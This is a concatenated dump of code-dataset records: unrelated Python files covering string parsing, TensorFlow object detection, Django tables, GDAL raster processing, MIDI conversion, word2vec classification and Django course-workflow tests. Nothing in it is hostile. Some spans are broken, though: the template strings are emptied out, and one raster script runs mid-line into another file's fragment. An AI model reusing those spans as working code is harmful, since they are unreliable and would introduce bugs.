bot.add_cog(Administrator(bot))","sub_path":"cogs/administrator.py","file_name":"administrator.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"222406235","text":"def last_char(string):\n # Return the position of the last character in the string\n # that is neither a space nor a tab. Returns zero for null or empty strings.\n last = 0\n for i in range(len(string)):\n if string[i] != ' ' and string[i] != '\\t':\n last = i + 1\n return last\n\ndef strip(cmd, p1):\n # Strip space and tab separated substrings out of a string.\n # Returns True if at least one word is stripped, False otherwise.\n char_cnt = 0 # Count of processed characters\n len_cmd = len(cmd) # Length of command string\n len_p1 = len(p1) # Length of substring\n more = True # More work to do\n stripped = False # Haven't stripped word\n\n while more and char_cnt < len_cmd:\n c1 = cmd[0] # Get leading character\n if c1 == ' ' or c1 == '\\t': # Strip away separators\n cmd = cmd[1:]\n char_cnt += 1\n else: # Found non-separator char\n if stripped:\n more = False # All done\n else: # Extract substring\n stripped = True\n pos_of_sp = cmd.find(' ') # Find position of next separator\n pos_of_tab = cmd.find('\\t')\n if pos_of_sp == -1:\n pos_of_sp = len_cmd\n if pos_of_tab == -1:\n pos_of_tab = len_cmd\n pos_of_sep = min(pos_of_sp, pos_of_tab)\n len_word = pos_of_sep\n p1 = cmd[:min(len_word, len_p1)] # Save the word\n cmd = cmd[min(pos_of_sep, len_cmd):] # Remove word from cmd\n char_cnt += len_word\n\n return stripped\n\ndef rd_int(string):\n # Strip the leading substring out of STRING and try to convert it into an integer.\n # Returns a tuple (success, number) where success is a boolean indicating if the conversion was successful,\n # and number is the integer value if success is True.\n stripped = strip(string, '')\n if not stripped:\n return False, None\n\n try:\n number = int(string)\n return True, number\n except ValueError:\n return False, None\n\ndef rd_logical(string):\n # Strip the leading substring out of STRING and try to convert it into a logical value.\n # Returns a tuple (success, value) where success is a boolean indicating if the conversion was successful,\n # and value is the logical value if success is True.\n stripped = strip(string, '')\n if not stripped:\n return False, None\n\n if string.lower() == 'true':\n return True, True\n elif string.lower() == 'false':\n return True, False\n else:\n return False, None\n\ndef rd_hex(string):\n # Strip the leading substring out of STRING and try to convert it from a hexadecimal string into an integer.\n # Returns a tuple (success, number) where success is a boolean indicating if the conversion was successful,\n # and number is the integer value if success is True.\n stripped = strip(string, '')\n if not stripped:\n return False, None\n\n try:\n number = int(string, 16)\n return True, number\n except ValueError:\n return False, None\n\ndef rd_real(string):\n # Strip the leading substring out of STRING andtry to convert it into a float.\n # Returns a tuple (success, number) where success is a boolean indicating if the conversion was successful,\n # and number is the float value if success is True.\n stripped = strip(string, '')\n if not stripped:\n return False, None\n\n try:\n number = float(string)\n return True, number\n except ValueError:\n return False, None\n\n","sub_path":"src/shared/stringlib.py","file_name":"stringlib.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"30766327","text":"import tensorflow as tf\nfrom PIL import Image\nimport sys\nimport numpy as np\nfrom PIL import Image, ImageDraw\nimport time\nimport model\nfrom settings import *\nimport utils\n\n\ndef main(argv, trained_model):\n all_default_box_list = utils.get_all_default_boxes()\n with tf.Graph().as_default(), tf.Session() as sess:\n input_img = tf.placeholder(dtype=tf.float32, shape=[1, IMG_W, IMG_H, 3], name='input')\n pred_cls, pred_loc = model.ssd_model(input_img, False)\n saver = tf.train.Saver()\n saver.restore(sess, trained_model)\n #sess.run(tf.global_variables_initializer())\n for img in argv:\n image = Image.open(img)\n image_w = image.width\n image_h = image.height\n image = image.resize([IMG_W, IMG_H])\n image = np.asarray(image)\n image = image - 127.5\n img_batch = []\n img_batch.append(image)\n t0 = time.time()\n cls, loc = sess.run([pred_cls, pred_loc], feed_dict={input_img: img_batch})\n #print(np.shape(cls), np.shape(loc))\n print(time.time() - t0)\n #cls = np.reshape(cls, newshape=[NUM_CLASS, NUM_ALL_DEFAULT_BOX])\n #loc = np.reshape(loc, newshape=[4, NUM_ALL_DEFAULT_BOX])\n #print(cls, loc)\n pred_box = utils.resolve(cls, loc, all_default_box_list)\n #resized_pred_box = []\n image = Image.open(img)\n draw = ImageDraw.Draw(image)\n for box in pred_box:\n tl_x = box[0] / IMG_W * image_w\n tl_y = box[1] / IMG_H * image_h\n br_x = box[2] / IMG_W * image_w\n br_y = box[3] / IMG_H * image_h\n #resized_pred_box.append([tl_x, tl_y, br_x, br_y])\n draw.rectangle([tl_x, tl_y, br_x, br_y])\n image.save('output_' + img, \"JPEG\")\n\n return 0\n\nif __name__ == '__main__':\n trained_model = './checkpoints/ssd_60000.ckpt'\n main(sys.argv[1:], trained_model)\n","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"29502609","text":"import django_tables2 as tables\nfrom django.template import Context\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.contrib.gis.geos import GEOSGeometry\nfrom django.utils import simplejson\nimport models\n\n\nclass JellyfishObservationTable(tables.Table):\n # LinkColum does not work with localeurl\n # date_observed = tables.LinkColumn('data_observation_update', args=[A('pk')])\n date_observed = tables.TemplateColumn(\n \"\"\"\n {{ record.date_observed|date:'d/m/Y H:i'}}\n \n \"\"\")\n observation_station = tables.Column()\n jellyfish_specie = tables.Column()\n quantity = tables.Column()\n source = tables.Column()\n created_by = tables.Column()\n route = None\n\n def __init__(self, *args, **kwargs):\n self.route = kwargs.pop('route', None)\n super(JellyfishObservationTable, self).__init__(*args, **kwargs)\n if self.route:\n self.context = Context({'route': self.route})\n self.base_columns['date_observed'].template_code = \"\"\"\n \n {{ record.date_observed|date:'d/m/Y H:i'}}\n \n \"\"\"\n\n class Meta:\n model = models.JellyfishObservation\n attrs = {\"class\": \"table table-striped\"}\n sequence = fields = (\n 'date_observed',\n 'observation_station',\n 'jellyfish_specie',\n 'quantity',\n 'created_by',\n 'source',\n )\n\n @property\n def verbose_name(self):\n if getattr(self, 'display_name', None):\n return self.display_name\n return self.Meta.model._meta.verbose_name_plural.title()\n\n\nclass JellyfishObservationExportTable(JellyfishObservationTable):\n date_observed = tables.Column()\n\n def __init__(self, *args, **kwargs):\n self.route = kwargs.pop('route', None)\n super(JellyfishObservationExportTable, self).__init__(*args, **kwargs)\n\n\nclass JellyfishObservationAggregatedTable(tables.Table):\n x = tables.Column(empty_values=())\n y = tables.Column(empty_values=())\n sum_quantity = tables.Column()\n station_name = tables.Column()\n route_name = tables.Column()\n\n def render_x(self, record):\n return \"{:.6f}\".format(GEOSGeometry(record['observation_station__position']).x)\n\n def render_y(self, record):\n return \"{:.6f}\".format(GEOSGeometry(record['observation_station__position']).y)\n\n @property\n def json(self):\n data = []\n for record in self.rows:\n data.append({\n 'lat': float(record['y']),\n 'lng': float(record['x']),\n 'station': record['station_name'],\n 'route': record['route_name'],\n 'count': record['sum_quantity']})\n return simplejson.dumps(data)\n\n def __init__(self, *args, **kwargs):\n self.route = kwargs.pop('route', None)\n super(JellyfishObservationAggregatedTable, self).__init__(*args, **kwargs)\n\n class Meta:\n attrs = {\"class\": \"table table-striped\"}\n\n\nclass ObservationRouteTable(tables.Table):\n name = tables.TemplateColumn(\n \"\"\"\n {{ record.name }}\n \n \"\"\")\n create_observation = tables.TemplateColumn(\n \"\"\"{% load i18n %}\n \n \n {% trans 'Add' %} {% trans 'observation' %}\n \"\"\",\n verbose_name=_('create observation'))\n\n class Meta:\n model = models.ObservationRoute\n attrs = {\"class\": \"table table-striped\"}\n fields = (\n 'name',\n )\n\n\nclass ObservationBeachTable(tables.Table):\n name = tables.TemplateColumn(\n \"\"\"\n {{ record.name }}\n \n \"\"\")\n island = tables.Column()\n municipality = tables.Column()\n create_observation = tables.TemplateColumn(\n \"\"\"{% load i18n %}\n \n \n {% trans 'Add' %} {% trans 'observation' %}\n \"\"\",\n verbose_name=_('create observation'))\n\n class Meta:\n model = models.ObservationRoute\n attrs = {\"class\": \"table table-striped\"}\n fields = (\n 'name',\n 'island',\n 'municipality',\n )\n","sub_path":"grumers/apps/data/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":4724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"374871757","text":"\"\"\"Graph a histogram of a remotely sensed image\"\"\"\nimport gdalnumeric\nimport turtle as t\n\ndef histogram(a, bins=range(0,256)):\n \"\"\"\n Histogram function for multi-dimensional array.\n a = array\n bins = range of numbers to match \n \"\"\"\n fa = a.flat\n n = gdalnumeric.numpy.searchsorted(gdalnumeric.numpy.sort(fa), bins)\n n = gdalnumeric.numpy.concatenate([n, [len(fa)]])\n hist = n[1:]-n[:-1] \n return hist\n\ndef draw_histogram(hist, scale=True):\n t.color(\"black\")\n # Draw the axes\n axes = ((-355, -200),(355, -200),(-355, -200),(-355, 250))\n t.up()\n for p in axes:\n t.goto(p)\n t.down()\n # Labels\n t.up()\n t.goto(0, -250)\n t.write(\"VALUE\",font=(\"Arial,\",12,\"bold\"))\n t.up()\n t.goto(-400, 280)\n t.write(\"FREQUENCY\",font=(\"Arial,\",12,\"bold\"))\n # Tick marks\n # x axis\n x = -355\n y = -200\n t.up()\n for i in range(1,11):\n x = x+65\n t.goto(x,y)\n t.down()\n t.goto(x,y-10)\n t.up()\n t.goto(x,y-25)\n t.write(\"%s\" % (i*25), align=\"center\")\n # y axis\n x = -355\n y = -200\n t.up()\n pixels = sum(hist[0])\n if scale:\n max = 0\n for h in hist:\n hmax = h.max()\n if hmax > max:\n max = hmax\n pixels = max\n label = pixels/10\n for i in range(1,11):\n y = y+45\n t.goto(x,y)\n t.down()\n t.goto(x-10,y)\n t.up()\n t.goto(x-15,y-6)\n t.write(\"%s\" % (i*label), align=\"right\")\n # Plot each histogram as a colored line\n x_ratio = 709.0 / 256\n y_ratio = 450.0 / pixels\n # Add more colors to this list if comparing\n # more than 3 bands or 1 image\n colors = [\"red\", \"green\", \"blue\"]\n for j in range(len(hist)):\n h = hist[j]\n x = -354\n y = -199\n t.up()\n t.goto(x,y)\n t.down()\n t.color(colors[j])\n for i in range(256):\n x = i * x_ratio\n y = h[i] * y_ratio\n x = x - (709/2)\n y = y + -199\n t.goto((x,y))\n \nim = \"swap.tif\"\nhistograms = []\narr = gdalnumeric.LoadFile(im)\nfor b in arr:\n histograms.append(histogram(b))\ndraw_histogram(histograms)\n\n# Hide our pen\nt.pen(shown=False)\nt.done() \n\n\n\n\n\n\n\n\"\"\"Perform a histogram stretch on an image\"\"\"\nimport gdalnumeric\nimport operator\n\ndef histogram(a, bins=range(0,256)):\n \"\"\"\n Histogram function for multi-dimensional array.\n a = array\n bins = range of numbers to match \n \"\"\"\n fa = a.flat\n n = gdalnumeric.numpy.searchsorted(gdalnumeric.numpy.sort(fa), bins)\n n = gdalnumeric.numpy.concatenate([n, [len(fa)]])\n hist = n[1:]-n[:-1] \n return hist\n\ndef stretch(a):\n \"\"\"\n Performs a histogram stretch on a gdalnumeric array image.\n \"\"\"\n hist = histogram(a)\n lut = []\n for b in range(0, len(hist), 256):\n # step size\n step = reduce(operator.add, hist[b:b+256]) / 255\n # create equalization lookup table\n n = 0\n for i in range(256):\n lut.append(n / step)\n n = n + hist[i+b]\n gdalnumeric.numpy.take(lut, a, out=a)\n return a\n\nsrc = \"swap.tif\"\narr = gdalnumeric.LoadFile(src)\nstretched = stretch(arr)\ngdalnumeric.SaveArray(arr, \"stretched.tif\", format=\"GTiff\", prototype=src)\n\n\n\n\n\"\"\"Clip a raster image using a shapefile\"\"\"\nimport operator\nimport gdal, gdalnumeric, osr\nimport shapefile\nimport Image, ImageDraw\n\n# Raster image to clip\nraster = \"stretched.tif\"\n\n# Polygon shapefile used to clip\nshp = \"hancock.shp\"\n\n# Name of clipped raster file(s)\noutput = \"clip\"\n \ndef imageToArray(i):\n \"\"\"\n Converts a Python Imaging Library array to a gdalnumeric image.\n \"\"\"\n a=gdalnumeric.numpy.fromstring(i.tostring(),'b')\n a.shape=i.im.size[1], i.im.size[0]\n return a\n \ndef world2Pixel(geoMatrix, x, y):\n \"\"\"\n Uses a gdal geomatrix (gdal.GetGeoTransform()) to calculate\n the pixel location of a geospatial coordinate \n \"\"\"\n ulX = geoMatrix[0]\n ulY = geoMatrix[3]\n xDist = geoMatrix[1]\n yDist = geoMatrix[5]\n rtnX = geoMatrix[2]\n rtnY = geoMatrix[4]\n pixel = int((x - ulX) / xDist)\n line = int((ulY - y) / xDist)\n return (pixel, line) \n\n# Load the source data as a gdalnumeric array\nsrcArray = gdalnumeric.LoadFile(raster)\n\n# Also load as a gdal image to get geotransform (world file) info\nsrcImage = gdal.Open(raster)\ngeoTrans = srcImage.GetGeoTransform()\n\n# Use pyshp to open the shapefile\nr = shapefile.Reader(\"%s.shp\" % shp)\n\n# Convert the layer extent to image pixel coordinates\nminX, minY, maxX, maxY = r.bbox\nulX, ulY = world2Pixel(geoTrans, minX, maxY)\nlrX, lrY = world2Pixel(geoTrans, maxX, minY)\n\n# Calculate the pixel size of the new image\npxWidth = int(lrX - ulX)\npxHeight = int(lrY - ulY)\n\nclip = srcArray[:, ulY:lrY, ulX:lrX]\n\n# Create a new geomatrix for the image\ngeoTrans = list(geoTrans)\ngeoTrans[0] = minX\ngeoTrans[3] = maxY\n\n# Map points to pixels for drawing the county boundary \n# on a blank 8-bit, black and white, mask image.\npixels = []\nfor p in r.shape(0).points:\n pixels.append(world2Pixel(geoTrans, p[0], p[1]))\nrasterPoly = Image.new(\"L\", (pxWidth, pxHeight), 1)\n# Create a blank image in PIL to draw the polygon.\nrasterize = ImageDraw.Draw(rasterPoly)\nrasterize.polygon(pixels, 0)\n# Convert the PIL image to a NumPy array\nmask = imageToArray(rasterPoly) \n\n# Clip the image using the mask\nclip = gdalnumeric.numpy.choose(mask, (clip, 0)).astype(gdalnumeric.numpy.uint8)\n\n# Save ndvi as tiff\ngdalnumeric.SaveArray(clip, \"%s.tif\" % output, format=\"GTiff\", prototype=raster)\n\n\n\n\n\n\"\"\"Classify a remotely sensed image\"\"\"\nimport gdalnumeric\n\n# Input file name (thermal image) \nsrc = \"thermal.tif\"\n\n# Output file name\ntgt = \"classified.jpg\"\n\n# Load the image into numpy using gdal\nsrcArr = gdalnumeric.LoadFile(src)\n\n# Split the histogram into 20 bins as our classes\nclasses = gdalnumeric.numpy.histogram(srcArr, bins=20)[1]\n\n# Color look-up table (LUT) - must be len(classes)+1.\n# Specified as R,G,B tuples \nlut = [[255,0,0],[191,48,48],[166,0,0],[255,64,64],\n[255,115,115],[255,116,0],[191,113,48],[255,178,115],\n[0,153,153],[29,115,115],[0,99,99],[166,75,0],\n[0,204,0],[51,204,204],[255,150,64],[92,204,204],[38,153,38],[0,133,0],\n[57,230,57],[103,230,103],[184,138,0]]\n\n# Starting value for classification\nstart = 1\n\n# Set up the RGB color JPEG output image\nrgb = gdalnumeric.numpy.zeros((3, srcArr.shape[0], srcArr.shape[1],), gdalnumeric.numpy.float32)\n \n# Process all classes and assign colors\nfor i in range(len(classes)):\n mask = gdalnumeric.numpy.logical_and(start <= srcArr, srcArr <= classes[i])\n for j in range(len(lut[i])):\n rgb[j] = gdalnumeric.numpy.choose(mask, (rgb[j], lut[i][j]))\n start = classes[i]+1 \n\n# Save the image \ngdalnumeric.SaveArray(rgb.astype(gdalnumeric.numpy.uint8), tgt, format=\"JPEG\")\n\n\n\n\n\"\"\"Threshold an image to black and white\"\"\"\nimport gdalnumeric\n\n# Input file name (thermal image) \nsrc = \"islands.tif\"\n\n# Output file name\ntgt = \"islands_classified.tiff\"\n\n# Load the image into numpy using gdal\nsrcArr = gdalnumeric.LoadFile(src)\n\n# Split the histogram into 20 bins as our classes\nclasses = gdalnumeric.numpy.histogram(srcArr, bins=2)[1]\n\nlut = [[255,0,0],[0,0,0],[255,255,255]]\n\n# Starting value for classification\nstart = 1\n\n# Set up the output image\nrgb = gdalnumeric.numpy.zeros((3, srcArr.shape[0], srcArr.shape[1],), gdalnumeric.numpy.float32)\n \n# Process all classes and assign colors\nfor i in range(len(classes)):\n mask = gdalnumeric.numpy.logical_and(start <= srcArr, srcArr <= classes[i])\n for j in range(len(lut[i])):\n rgb[j] = gdalnumeric.numpy.choose(mask, (rgb[j], lut[i][j]))\n start = classes[i]+1 \n\n# Save the image \ngdalnumeric.SaveArray(rgb.astype(gdalnumeric.numpy.uint8), tgt, format=\"GTIFF\", prototype=src)\n\n\n\n\n\n\n\"\"\"Automatically extract features of a thresholded image to a shapefile\"\"\"\nimport gdal\nimport ogr, osr\n\n# Thresholded input raster name\nsrc = \"islands_classified.tiff\"\n# Output shapefile name\ntgt = \"extract.shp\"\n# OGR layer name\ntgtLayer = \"extract\"\n# Open the input raster\nsrcDS = gdal.Open(src)\n# Grab the first band\nband = srcDS.GetRasterBand(1)\n# Force gdal to use the band as a mask\nmask = band\n# Set up the output shapefile\ndriver = ogr.GetDriverByName(\"ESRI Shapefile\")\nshp = driver.CreateDataSource(tgt)\n# Copy the spatial reference\nsrs = osr.SpatialReference()\nsrs.ImportFromWkt(srcDS.GetProjectionRef())\nlayer = shp.CreateLayer(tgtLayer, srs=srs)\n# Set up the dbf file\nfd = ogr.FieldDefn( \"DN\", ogr.OFTInteger )\nlayer.CreateField(fd)\ndst_field = 0\n# Automatically extract features from an image!\nextract = gdal.Polygonize(band, mask, layer, dst_field, [], None)\n\n\n\n\n\n\n\"\"\"Rasterize a shapefile and account for polygon holes\"\"\"\nimport shapefile\nimport pngcanvas\n# Open the extracted islands\nr = shapefile.Reader(\"extract.shp\")\n# Setup the world to pixels conversion\nxdist = r.bbox[2] - r.bbox[0]\nydist = r.bbox[3] - r.bbox[1]\niwidth = 800\niheight = 600\nxratio = iwidth/xdist\nyratio = iheight/ydist\npolygons = []\n# Loop through all shapes\nfor shape in r.shapes():\n # Loop through all parts to catch\n # polygon holes!\n for i in range(len(shape.parts)):\n pixels=[]\n pt = None\n if i3.4f}\".format(note.start), \"{:0>3.4f}\".format(note.end), \"{:3.4f}\".format(note.duration), note.velocity])\r\n\r\n\r\n\r\ntry:\r\n midi_dir = sys.argv[1]\r\nexcept IndexError:\r\n raise SystemExit(f\"Usage: {sys.argv[0]} \")\r\n\r\nfor filename in os.listdir(midi_dir):\r\n if filename.endswith(\".mid\"):\r\n process_midi(os.path.join(midi_dir, filename))\r\n","sub_path":"midi2csv.py","file_name":"midi2csv.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"248055627","text":"import os\nimport h5py\n\n# Returns an array of the indices [ix1, .. ixn] such that ixi is the index of the \n# element in the longer list that is closest to the ith value in the shorter list\n# So \"element i is closest to element ixi\"\ndef find_closest_indices(longer_list, shorter_list):\n if len(shorter_list) > len(longer_list):\n print('THE SYNTAX IS THAT THE LONGER LIST MUST GO FIRST')\n raise KeyError \n new_list = []\n ix_star =0\n for item2 in shorter_list:\n ix = 0\n for item1 in longer_list:\n diff = abs(item1 - item2)\n if ix == 0:\n closest = diff\n ix_star = ix\n elif (diff < closest and ix != 0):\n closest = diff\n ix_star = ix\n ix+=1\n new_list.append(ix_star)\n return new_list\n\ndef create_link(ad, name, newline = True, html_line_break=True, bootstrap = False):\n if bootstrap == True:\n newline = False\n html_line_break = False\n \n if newline == True and html_line_break == True:\n ad = r'\"' + ad + r'\"'\n new_line = '' + name + '
\\n' \n if newline == False and html_line_break == True:\n ad = r'\"' + ad + r'\"'\n new_line = '' + name + '
'\n if newline == True and html_line_break == False:\n ad = r'\"' + ad + r'\"'\n new_line = '' + name + '\\n'\n if newline == False and html_line_break == False: \n ad = r'\"' + ad + r'\"'\n new_line = '' + name + ''\n if bootstrap == True:\n new_line = '
  • ' + new_line + '
  • \\n'\n \n return new_line\n\ndef find_substring(sub, string):\n index = string.find(sub)\n return index\n\ndef grab_between(first_key, last_key, text_file, ends = False):\n file = open(text_file, 'r')\n contents = file.read()\n ix0 = find_substring(first_key, contents)\n ix1 = find_substring(last_key, contents)\n \n if ends == False:\n text_between_keys = contents[ix0 + len(first_key) : ix1] \n else: \n text_between_keys = contents[ix0 : ix1 + len(last_key)]\n \n return text_between_keys\n\ndef make_textbox(vartup, nametup, cur_min = None, cur_max = None):\n textbox = ( nametup[0] + ' (current value:' + str(cur_min) \n + ''') \\n\n
    \\n'''\n + nametup[1] +' (current value:' + str(cur_max)\n +''')\\n\n
    \\n''' )\n return textbox\n\ndef filter_h5(path):\n fnames = os.listdir(path)\n good_list = []\n for fname in fnames:\n try:\n h5py.File(path + fname)\n good_list.append(fname)\n except:\n pass\n return good_list","sub_path":"awakeAppModules/ancillary_funcs.py","file_name":"ancillary_funcs.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"336735450","text":"dict1 = {'서울': '서울특별시',\n '부산': '부산광역시',\n '대구': '대구광역시',\n '인천': '인천광역시',\n '광주': '광주광역시',\n '대전': '대전광역시',\n '울산': '울산광역시',\n '세종': '세종특별자치시',}\nfor i in dict1.keys():\n dict1[i + '시'] = dict1[i]\n\ndict2 = {'경기': '경기도',\n '강원': '강원도',\n '충북': '충청북도',\n '충남': '충청남도',\n '전남': '전라남도',\n '전북': '전라북도',\n '경남': '경상남도',\n '경북': '경상북도',\n '제주': '제주특별자치도',\n '제주도': '제주특별자치도'}\n\ndict1.update(dict2)\n\nfor key in dict1.keys():\n shinhan.sido[shinhan.sido == key] = dict1[key]","sub_path":"pj1/nationalpn.py","file_name":"nationalpn.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"59766799","text":"import os\nimport sys\nfrom tqdm import tqdm\nimport pandas as pd\nimport numpy as np\nfrom random import choice, choices\n\nimport process_fp\nimport gensim as gn\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import classification_report, confusion_matrix, accuracy_score\n\ndef load_data(buckets, k):\n\n X = []\n y = []\n\n for bucket in buckets:\n for i in range(k):\n seq = choices(buckets[bucket], k=200)\n seq = sorted(seq)\n X.append(seq)\n y.append(bucket)\n\n return X, y\n\ndef create_w2v(vocabulary):\n w2v = gn.models.Word2Vec(min_count=1, size=25, window=2)\n w2v.build_vocab(vocabulary, progress_per=10000)\n w2v.train(vocabulary, total_examples=w2v.corpus_count, epochs=30)\n return w2v\n\ndef create_Sentences(buckets):\n sentences = []\n\n for bucket in buckets:\n sentences.append(buckets[bucket])\n\n return sentences\n\ndef preprocess(X, y, sentences):\n\n w2v = create_w2v(sentences)\n\n for x in X:\n for i in range(len(x)):\n fp = x[i]\n x[i] = w2v.wv[fp]\n\n le = LabelEncoder()\n le.fit_transform(y)\n\n X = np.array(X)\n nsamples, nx, ny = X.shape\n X = X.reshape((nsamples, nx*ny))\n\n return X, y, le\n\ndef clean_dir(direc):\n for f in os.listdir(direc):\n os.remove(os.path.join(direc, f))\n\ndef model(X, y):\n\n svc = SVC(kernel='sigmoid')\n svc.fit(X, y)\n\n return svc\n\ndef process_train(train_direc, data_direc):\n process_fp.preprocess(train_direc, data_direc)\n allfps, buckets = process_fp.process(train_direc, data_direc)\n\n X, y = load_data(buckets, 100)\n\n sentences = create_Sentences(buckets)\n X, y, labels = preprocess(X, y, sentences)\n\n clean_dir(data_direc)\n return X, y, sentences\n\ndef process_test(test_direc, data_direc, train_sentences, samples):\n process_fp.preprocess(test_direc, data_direc)\n alltestsfps, test_buckets = process_fp.process(test_direc, data_direc)\n\n X_test, y_test = load_data(test_buckets, samples)\n\n test_sentences = create_Sentences(test_buckets)\n X_test, y_test, labels = preprocess(X_test, y_test, (train_sentences + test_sentences))\n\n clean_dir(data_direc)\n return X_test, y_test\n\ndef detect_errors(svc, X_test, y_test):\n\n y_pred = svc.predict(X_test)\n\n print(confusion_matrix(y_test, y_pred))\n print(classification_report(y_test, y_pred))\n print('Accuracy Score: ', accuracy_score(y_test, y_pred))\n\n\nX_train, y_train, train_buckets = process_train('train/', 'data/')\n\nX_test, y_test = process_test('test/', 'data/', train_buckets, 30)\n\nsvc = model(X_train, y_train)\n\ndetect_errors(svc, X_test, y_test)","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"447463745","text":"from datetime import datetime, timedelta, date\nfrom unittest.mock import patch, Mock\n\nfrom django.test import TestCase, override_settings\nfrom django.core.cache import caches\nfrom django.core import mail\n\nfrom django_webtest import WebTest\nfrom model_mommy import mommy\n\nfrom evap.evaluation.models import (Contribution, Course, CourseType, EmailTemplate, NotArchiveable, Question,\n Questionnaire, RatingAnswerCounter, Semester, TextAnswer, UserProfile)\nfrom evap.evaluation.tests.tools import let_user_vote_for_course\nfrom evap.results.tools import calculate_average_distribution\nfrom evap.results.views import get_course_result_template_fragment_cache_key\n\n\n@override_settings(EVALUATION_END_OFFSET_HOURS=0)\nclass TestCourses(WebTest):\n def test_approved_to_in_evaluation(self):\n course = mommy.make(Course, state='approved', vote_start_datetime=datetime.now())\n\n with patch('evap.evaluation.models.EmailTemplate.send_to_users_in_courses') as mock:\n Course.update_courses()\n\n template = EmailTemplate.objects.get(name=EmailTemplate.EVALUATION_STARTED)\n mock.assert_called_once_with(template, [course], [EmailTemplate.ALL_PARTICIPANTS],\n use_cc=False, request=None)\n\n course = Course.objects.get(pk=course.pk)\n self.assertEqual(course.state, 'in_evaluation')\n\n def test_in_evaluation_to_evaluated(self):\n course = mommy.make(Course, state='in_evaluation', vote_start_datetime=datetime.now() - timedelta(days=2),\n vote_end_date=date.today() - timedelta(days=1))\n\n with patch('evap.evaluation.models.Course.is_fully_reviewed') as mock:\n mock.__get__ = Mock(return_value=False)\n Course.update_courses()\n\n course = Course.objects.get(pk=course.pk)\n self.assertEqual(course.state, 'evaluated')\n\n def test_in_evaluation_to_reviewed(self):\n # Course is \"fully reviewed\" as no open text answers are present by default.\n course = mommy.make(Course, state='in_evaluation', vote_start_datetime=datetime.now() - timedelta(days=2),\n vote_end_date=date.today() - timedelta(days=1))\n\n Course.update_courses()\n\n course = Course.objects.get(pk=course.pk)\n self.assertEqual(course.state, 'reviewed')\n\n def test_in_evaluation_to_published(self):\n # Course is \"fully reviewed\" and not graded, thus gets published immediately.\n course = mommy.make(Course, state='in_evaluation', vote_start_datetime=datetime.now() - timedelta(days=2),\n vote_end_date=date.today() - timedelta(days=1),\n is_graded=False)\n\n with patch('evap.evaluation.tools.send_publish_notifications') as mock:\n Course.update_courses()\n\n mock.assert_called_once_with([course])\n\n course = Course.objects.get(pk=course.pk)\n self.assertEqual(course.state, 'published')\n\n @override_settings(EVALUATION_END_WARNING_PERIOD=24)\n def test_evaluation_ends_soon(self):\n course = mommy.make(Course, vote_start_datetime=datetime.now() - timedelta(days=2),\n vote_end_date=date.today() + timedelta(hours=24))\n\n self.assertFalse(course.evaluation_ends_soon())\n\n course.vote_end_date = date.today()\n self.assertTrue(course.evaluation_ends_soon())\n\n course.vote_end_date = date.today() - timedelta(hours=48)\n self.assertFalse(course.evaluation_ends_soon())\n\n @override_settings(EVALUATION_END_WARNING_PERIOD=24, EVALUATION_END_OFFSET_HOURS=24)\n def test_evaluation_ends_soon_with_offset(self):\n course = mommy.make(Course, vote_start_datetime=datetime.now() - timedelta(days=2),\n vote_end_date=date.today())\n\n self.assertFalse(course.evaluation_ends_soon())\n\n course.vote_end_date = date.today() - timedelta(hours=24)\n self.assertTrue(course.evaluation_ends_soon())\n\n course.vote_end_date = date.today() - timedelta(hours=72)\n self.assertFalse(course.evaluation_ends_soon())\n\n def test_evaluation_ended(self):\n # Course is out of evaluation period.\n mommy.make(Course, state='in_evaluation', vote_start_datetime=datetime.now() - timedelta(days=2),\n vote_end_date=date.today() - timedelta(days=1), is_graded=False)\n # This course is not.\n mommy.make(Course, state='in_evaluation', vote_start_datetime=datetime.now() - timedelta(days=2),\n vote_end_date=date.today(), is_graded=False)\n\n with patch('evap.evaluation.models.Course.evaluation_end') as mock:\n Course.update_courses()\n\n self.assertEqual(mock.call_count, 1)\n\n def test_approved_to_in_evaluation_sends_emails(self):\n \"\"\" Regression test for #945 \"\"\"\n participant = mommy.make(UserProfile, email='foo@example.com')\n course = mommy.make(Course, state='approved', vote_start_datetime=datetime.now(), participants=[participant])\n\n Course.update_courses()\n\n course = Course.objects.get(pk=course.pk)\n self.assertEqual(len(mail.outbox), 1)\n self.assertEqual(course.state, 'in_evaluation')\n\n def test_has_enough_questionnaires(self):\n # manually circumvent Course's save() method to have a Course without a general contribution\n # the semester must be specified because of https://github.com/vandersonmota/model_mommy/issues/258\n Course.objects.bulk_create([mommy.prepare(Course, semester=mommy.make(Semester), type=mommy.make(CourseType))])\n course = Course.objects.get()\n self.assertEqual(course.contributions.count(), 0)\n self.assertFalse(course.general_contribution_has_questionnaires)\n self.assertFalse(course.all_contributions_have_questionnaires)\n\n responsible_contribution = mommy.make(\n Contribution, course=course, contributor=mommy.make(UserProfile),\n responsible=True, can_edit=True, textanswer_visibility=Contribution.GENERAL_TEXTANSWERS)\n course = Course.objects.get()\n self.assertFalse(course.general_contribution_has_questionnaires)\n self.assertFalse(course.all_contributions_have_questionnaires)\n\n general_contribution = mommy.make(Contribution, course=course, contributor=None)\n course = Course.objects.get()\n self.assertFalse(course.general_contribution_has_questionnaires)\n self.assertFalse(course.all_contributions_have_questionnaires)\n\n questionnaire = mommy.make(Questionnaire)\n general_contribution.questionnaires.add(questionnaire)\n 